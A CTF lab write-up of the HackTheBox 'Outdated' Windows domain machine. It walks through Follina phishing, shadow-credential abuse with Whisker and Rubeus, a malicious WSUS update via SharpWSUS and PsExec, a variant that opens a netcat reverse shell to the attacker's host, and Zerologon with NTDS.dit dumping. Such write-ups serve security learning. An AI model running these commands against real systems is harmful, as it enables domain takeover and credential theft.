Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-09-20 06:11:56 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/HackTheBox/Outdated.md

337 lines
12 KiB
Markdown
Raw Normal View History

Create Outdated.md
2022-12-10 15:40:27 +00:00
# HackTheBox - Outdated
## NMAP
```bash
Nmap scan report for 10.10.11.175
Host is up (0.42s latency).
Not shown: 65519 filtered ports
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-14 02:03:33Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Issuer: commonName=outdated-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-18T05:50:24
| Not valid after: 2024-06-18T06:00:24
| MD5: ddf3 d13d 3a6a 3fa0 1dee 8321 6784 83dc
|_SHA-1: 7544 3aee ffbc 2ea7 bf61 1380 0a6c 16f1 cd07 afce
|_ssl-date: 2022-08-14T02:06:34+00:00; +7h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Issuer: commonName=outdated-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8530/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site does not have a title.
8531/tcp open unknown
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
54116/tcp open msrpc Microsoft Windows RPC
54125/tcp open msrpc Microsoft Windows RPC
```
### PORT 139/445 (SMB)
Checking for null authentication on smb we can list shares
<img src="https://i.imgur.com/9O6XieM.png"/>
Checking the `Shares` directory , it has a pdf which we can transfer it on your machine with `get`
<img src="https://i.imgur.com/KecIMt0.png"/>
<img src="https://i.imgur.com/8gmAtnW.png"/>
<img src="https://i.imgur.com/HLjRrRD.png"/>
The pdf talks about a breach on serevers and mentions about emailing the web application links to `itsupport@outdated.htb` through smtp and talks about patching the recent vulnerabilities
Now we can test for these CVEs but here only two CVEs are of high score which means they are critical than the others which are `CVE-2022-30190` dubbed as `Follina` and `CVE-2022-29130` which is rce through LDAP
## Foothold
### PORT 25 (SMTP)
On connecting with smpt with `telnet`,we send an email to `itsupport@outdated.htb` with a link on which we'll get a hit
<img src="https://i.imgur.com/w19ohcV.png"/>
<img src="https://i.imgur.com/uCkaR5P.png"/>
### Testing for CVE-2022-30190 (Follina)
I tried testing to Follina from john hammond's repository
https://github.com/JohnHammond/msdt-follina
Before running this we need to make a change with the `invoke-request` which is downloading `nc64.exe` from github, so we need to host it from our machine
<img src="https://i.imgur.com/E5HP6Qg.png"/>
<img src="https://i.imgur.com/K49sX3z.png"/>
Now run the script with hosting the payload on port 80
<img src="https://i.imgur.com/KM0ECFY.png"/>
And send the url through email
<img src="https://i.imgur.com/MZXo0ME.png"/>
After gettting a shell, I tried listing usernames with `net user` also checking the groups in which `btables` is in but that user doesn't exist
<img src="https://i.imgur.com/MC7F7v5.png"/>
But checking it with `/domain` it does
<img src="https://i.imgur.com/0IXdetf.png"/>
Which shows that this user is in `ITStaff` group
<img src="https://i.imgur.com/RtF7wLx.png"/>
So probably we are in some container as the IP is different as well
<img src="https://i.imgur.com/3gWPjVY.png"/>
On running linpeas we can see wsus is vulnerable
<img src="https://i.imgur.com/jN6MzFy.png"/>
We can also see that there are some kerberos tickets which are in the proces
<img src="https://i.imgur.com/zC5NplY.png"/>
I tried using `sharpwsus` but couldn't proceed further as it wasn't able to inspect the wsus server
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
<img src="https://i.imgur.com/QvpqYSE.png"/>
So going back to AD enumeartion, I used `sharphound` to dump the data and transffered it through `nc`
<img src="https://i.imgur.com/vJaiKmG.png"/>
<img src="https://i.imgur.com/HnVNmao.png"/>
Uploading the data on bloodhound
<img src="https://i.imgur.com/5OJzQEM.png"/>
From the built in quries it didn't showed a path to escalate for btables
<img src="https://i.imgur.com/UHh59Aq.png"/>
## Privilege Escalation (sflowers)
I wasted a lot of time here until I updated both bloodhound and neo4j to the latest version
https://linuxhint.com/install-neo4j-ubuntu/
Following this I added the repository for the neo4j 4.4 as the latest version of bloodhound needs that specific version also latest build of sharphound is also required
```
sudo curl -fsSL https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -
sudo add-apt-repository "deb https://debian.neo4j.com stable 4.4"
```
<img src="https://i.imgur.com/dxxeGYU.png"/>
<img src="https://i.imgur.com/6fAMoyK.png"/>
<img src="https://i.imgur.com/6fAMoyK.png"/>
When updating neo4j make sure to set this value to true
<img src="https://i.imgur.com/1iKLGxD.png"/>
Running the updated version of sharphound
https://github.com/BloodHoundAD/SharpHound
<img src="https://i.imgur.com/Ci8YjAD.png"/>
Now after uploading the json files, we'll see a path to escalate from btables users
<img src="https://i.imgur.com/V62pvuo.png"/>
We can see the abuse info for `AddKeyCredentialLink` in which we can shadow credentials for `sflowers` user
<img src="https://i.imgur.com/rjduzZN.png"/>>
<img src="https://i.imgur.com/APmFVvT.png"/>
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
This article explains the abuse of shadow credentials with `Whisker`
https://github.com/eladshamir/Whisker
For building the exe I used Visual Studio
<img src="https://i.imgur.com/IaMbOqX.png"/>
<img src="https://i.imgur.com/KFyhnaZ.png"/>
<img src="https://i.imgur.com/KFyhnaZ.png"/>
We can run this command for generating a certificate for key credential, which on runnning will show us the command for rubeus for getting NTLM hash for slfowers through PKINIT which is a pre-authentication through certificate
```bash
.\Whisker.exe add /target:sflowers /domain:outdated.htb /dc:dc.outdated.htb
```
<img src="https://i.imgur.com/tRcDD0d.png"/>
And with this command we can get the NTLM hash for sflowers
```
Rubeus.exe asktgt /user:sflowers /certificate:"<generated certificate>/password:"<generatedd certificate password" /domain:outdated.htb /dc:dc.outdated.htb /getcredentials /show
```
<img src="https://i.imgur.com/0I9qGV3.png"/>
Using pass the hash through `evil-winrm` we can login
<img src="https://i.imgur.com/6xWtvHt.png"/>
Looking at the groups we are in `WSUS Administrators` group
<img src="https://i.imgur.com/PpyrH1C.png"/>
We can try runnning sharpwsus again
<img src="https://i.imgur.com/foJ5dR1.png"/>
Now what wsus (Windows Service Update) exactly is, it's a solution for deploying windows updates for systems in a domain where the hosts don't have to reach out to internet to get the updates instead they can get updates internally
To abuse this we can create a malcious update with using `PsExec` as it uses the signed exe from microsoft, and psexec is from sysinternals it won't be flagged so we can execute anyhing using that
```powershell
cmd.exe /c 'SharpWSUS.exe create /payload:"C:\Users\sflowers\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c \" net localgroup administrators sflowers /add\"" /title:"Updauwte"'
```
Here the reason why I used cmd to run execute the sharpwsus is command is that it doesn't run properly with powershell and needs to escapte quotes
<img src="https://i.imgur.com/a5XVRWp.png"/>
Approving the update
```
SharpWSUS.exe approve /updateid:d47b1ac0-b4f7-43ca-b21f-dfbcf0499697 /computername:dc.outdated.htb /groupname:"pleauswse"
```
<img src="https://i.imgur.com/7aOBlXs.png"/>
And then check the status if the update has been installed
<img src="https://i.imgur.com/s8aoAaK.png"/>
Having the update installed which will add sflowers into the local administrator group, we can verify it by checking in which groups slfowers belongs to now
<img src="https://i.imgur.com/lw53NhQ.png"/>
Being in administrator's group on domain controller we can dump the SAM and NTDS.dit hashes
<img src="https://i.imgur.com/yz1WNiv.png"/>
Grabbing administrator's hash from NTDS.dit to perform pass the hash
<img src="https://i.imgur.com/zhN3MeJ.png"/>
We can also use any of the exec scripts from impacket
<img src="https://i.imgur.com/K84KUUI.png"/>
<img src="https://i.imgur.com/HXAc4gy.png"/>
Instead of adding the user in administrators group we could have gotten a reverse shell through netcat as well
```powershell
cmd.exe /c 'SharpWSUS.exe create /payload:"C:\Users\sflowers\PsExec64.exe" /args:"-accepteula -s -d cmd.exe
/c \" C:\Users\sflowers\nc64.exe 10.10.14.52 2222 -e cmd.exe\"" /title:"Updauwte"'
```
<img src="https://i.imgur.com/xcD6VhM.png"/>
<img src="https://i.imgur.com/8a0jNfM.png"/>
<img src="https://i.imgur.com/wXwcU0A.png"/>
## Un-intedned
### Testing for CVE-2020-1472 (Zerologon)
Now this CVE is old, but it's pretty common in AD as the machine was patched with recent CVEs but it this machine maybe vulnerable to zerologon
Which we can test if the machine is vulnerable with a testing script for the CVE
https://github.com/SecuraBV/CVE-2020-1472
The script needs netbios name which is the machine account name, we can get it with `enum4-linux`
<img src="https://i.imgur.com/FUM2nP3.png"/>
<img src="https://i.imgur.com/4XdVhGY.png"/>
<img src="https://i.imgur.com/qt0M6fj.png"/>
Now that we know it's vulnerable we can exploit it with `-x`
<img src="https://i.imgur.com/XBOXSHC.png"/>
We can dump the NTDS.dit with the computer account which is `DC` with a blank password
<img src="https://i.imgur.com/sDXab57.png"/>
And can perform pass the hash to get a shell as Administrator
<img src="https://i.imgur.com/1tPzg74.png"/>
## References
- https://github.com/JohnHammond/msdt-follina
- https://github.com/rth0pper/zerologon
- https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation
- https://linuxhint.com/install-neo4j-ubuntu/
- https://github.com/BloodHoundAD/SharpHound
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
- https://github.com/eladshamir/Whisker
- https://securityonline.info/sharpwsus-csharp-tool-for-lateral-movement-through-wsus/
- https://labs.nettitude.com/blog/introducing-sharpwsus/
Reference in a new issue Copy permalink